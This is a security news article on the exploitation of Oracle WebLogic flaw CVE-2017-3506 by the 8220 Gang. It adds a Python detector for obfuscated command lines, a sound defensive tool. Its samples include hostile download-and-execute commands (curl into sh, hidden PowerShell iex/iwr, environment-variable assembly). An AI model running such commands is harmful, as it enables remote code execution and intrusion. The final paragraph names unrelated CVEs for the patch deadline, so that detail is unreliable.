The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a security flaw affecting Oracle WebLogic Server to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
Tracked as CVE-2017-3506 (CVSS score: 7.4), the issue is an operating system (OS) command injection vulnerability that can be exploited to gain unauthorized access to vulnerable servers and take complete control of them. Oracle fixed the flaw in its April 2017 Critical Patch Update, so the exploitation seen here targets installations that are years behind on patching.
“Oracle WebLogic Server, a product within the Fusion Middleware suite, contains an OS command injection vulnerability that allows an attacker to execute arbitrary code via a specially crafted HTTP request that includes a malicious XML document,” CISA said.
While the agency did not disclose the nature of the attacks exploiting the vulnerability, the China-based cryptojacking group known as the 8220 Gang (aka Water Sigbin) has a history of leveraging it since early 2023 to co-opt unpatched devices into a crypto-mining botnet.
According to a recent report published by Trend Micro, the 8220 Gang has been observed weaponizing flaws in Oracle WebLogic Server (CVE-2017-3506 and CVE-2023-21839) to launch a cryptocurrency miner filelessly in memory by means of a shell or PowerShell script, depending on the operating system targeted.
“The gang employed obfuscation techniques, such as hexadecimal encoding of URLs and using HTTP over port 443, allowing for stealthy payload delivery,” security researcher Sunil Bharti said. “The PowerShell script and the resulting batch file involved complex encoding, using environment variables to hide malicious code within seemingly benign script components.”
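The three tricks Bharti describes (hex-encoded URLs, cleartext HTTP on port 443, and commands stitched back together from environment variables) are all things a detection pipeline can normalise away before matching. The Python below is an added example written for this page, not code from Trend Micro, Oracle, or the 8220 Gang's own scripts. The regex forms, the indicator names, the assumption that "hexadecimal encoding" covers `\xNN` runs, `%NN` runs, PowerShell `[char]0xNN` chains and hex-literal IPv4 hosts, and every sample command line are constructed for illustration, not captured samples.

```python
import ipaddress
import re
from urllib.parse import unquote

# Assumed shapes of the obfuscation styles discussed above (not the exact
# strings from the Trend Micro report).
HEX_ESC = re.compile(r'(?:\\x[0-9a-fA-F]{2}){2,}')                      # \x68\x74...
PCT_ESC = re.compile(r'(?:%[0-9a-fA-F]{2}){2,}')                        # %68%74...
CHAR_CHAIN = re.compile(                                                # [char]0x68+[char]0x74...
    r'\[char\]0x[0-9a-fA-F]{2}(?:\s*\+\s*\[char\]0x[0-9a-fA-F]{2})+', re.I)
ENV_ASSEMBLY = re.compile(r'%\w+%%\w+%|\$env:\w+\s*\+\s*\$env:\w+', re.I)  # %a%%b% or $env:a+$env:b
URL = re.compile(r'(https?)://([^\s/:"\'()&]+)(?::(\d+))?(/[^\s"\';)&]*)?', re.I)


def decode_hex_runs(text: str) -> str:
    """Expand \\xNN runs, [char]0xNN chains and %NN runs into the characters they encode."""
    text = HEX_ESC.sub(
        lambda m: bytes.fromhex(m.group(0).replace('\\x', '')).decode('latin-1'), text)
    text = CHAR_CHAIN.sub(
        lambda m: ''.join(chr(int(h, 16)) for h in re.findall(r'0x([0-9a-fA-F]{2})', m.group(0))),
        text)
    return PCT_ESC.sub(lambda m: unquote(m.group(0)), text)


def normalize_host(host: str) -> str:
    """Turn a hex (0xC0A80101) or plain-integer (3232235777) IPv4 literal into dotted form."""
    try:
        if host.lower().startswith('0x'):
            return str(ipaddress.IPv4Address(int(host, 16)))
        if host.isdigit():
            return str(ipaddress.IPv4Address(int(host)))
    except ValueError:
        pass
    return host


def extract_urls(text: str) -> list:
    """Decode the line, then pull out every URL with its host normalised and its effective port."""
    urls = []
    for scheme, host, port, path in URL.findall(decode_hex_runs(text)):
        scheme = scheme.lower()
        urls.append({
            'scheme': scheme,
            'raw_host': host,
            'host': normalize_host(host),
            'port': int(port) if port else (443 if scheme == 'https' else 80),
            'path': path or '/',
        })
    return urls


def assess(line: str) -> dict:
    """Return the indicators that fire on one command line, plus the decoded URLs."""
    urls = extract_urls(line)
    indicators = set()
    if HEX_ESC.search(line) or PCT_ESC.search(line) or CHAR_CHAIN.search(line):
        indicators.add('hex_encoded_content')
    if ENV_ASSEMBLY.search(line):
        indicators.add('env_var_assembly')
    for u in urls:
        if u['raw_host'] != u['host']:
            indicators.add('hex_or_int_ip_host')
        if u['scheme'] == 'http' and u['port'] == 443:   # cleartext HTTP hiding on the TLS port
            indicators.add('plain_http_on_443')
    return {'indicators': sorted(indicators), 'urls': urls}


def triage(lines) -> list:
    """Return (index, indicators) for every line that trips at least one indicator."""
    hits = []
    for i, line in enumerate(lines):
        found = assess(line)['indicators']
        if found:
            hits.append((i, found))
    return hits


def char_chain(s: str) -> str:
    """Render a string as a PowerShell [char]0xNN+[char]0xNN chain (used only to build a sample)."""
    return '+'.join(f'[char]0x{ord(c):02x}' for c in s)


# Constructed sample process command lines; none of these are real captures.
SAMPLE_LINES = [
    # 0: hex-literal IPv4 host, percent-encoded path, cleartext HTTP on 443
    'curl -fsSL http://0xc0a80101:443/%6c%6f%61%64.sh | sh',
    # 1: download URL assembled from [char] literals inside a hidden PowerShell session
    'powershell -nop -w hidden -c "$u=' + char_chain('http://10.0.0.5:443/p.ps1')
    + '; iex (iwr $u -UseBasicParsing)"',
    # 2: batch one-liner stitching the interpreter name together from environment variables
    'cmd /c "set a=pow&&set b=ershell&&set c= -c iex(iwr http://0x0a000005/b)&&%a%%b%%c%"',
    # 3, 4: ordinary administrative activity that should stay quiet
    'curl -fsSL https://dl.example.test/agent.sh | sh',
    'powershell -c "Get-Process | Out-File C:\\temp\\procs.txt"',
]

if __name__ == '__main__':
    for idx, found in triage(SAMPLE_LINES):
        print(idx, found, [(u['host'], u['port'], u['path']) for u in assess(SAMPLE_LINES[idx])['urls']])
```

Decoding before matching is the whole point: a rule that looks for `http://` and `:443` in the raw command line misses samples 0 and 1, while the normalised URL (`192.168.1.1:443/load.sh`, `10.0.0.5:443/p.ps1`) makes both the cleartext-on-443 and the hex-host tricks visible. The thresholds here are deliberately loose heuristics and will need tuning against your own baseline of PowerShell and batch usage.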
In light of the active exploitation of CVE-2024-1086 and CVE-2024-24919, federal civilian executive branch agencies are required under Binding Operational Directive 22-01 to apply the vendor fixes by June 24, 2024, to protect their networks against potential threats.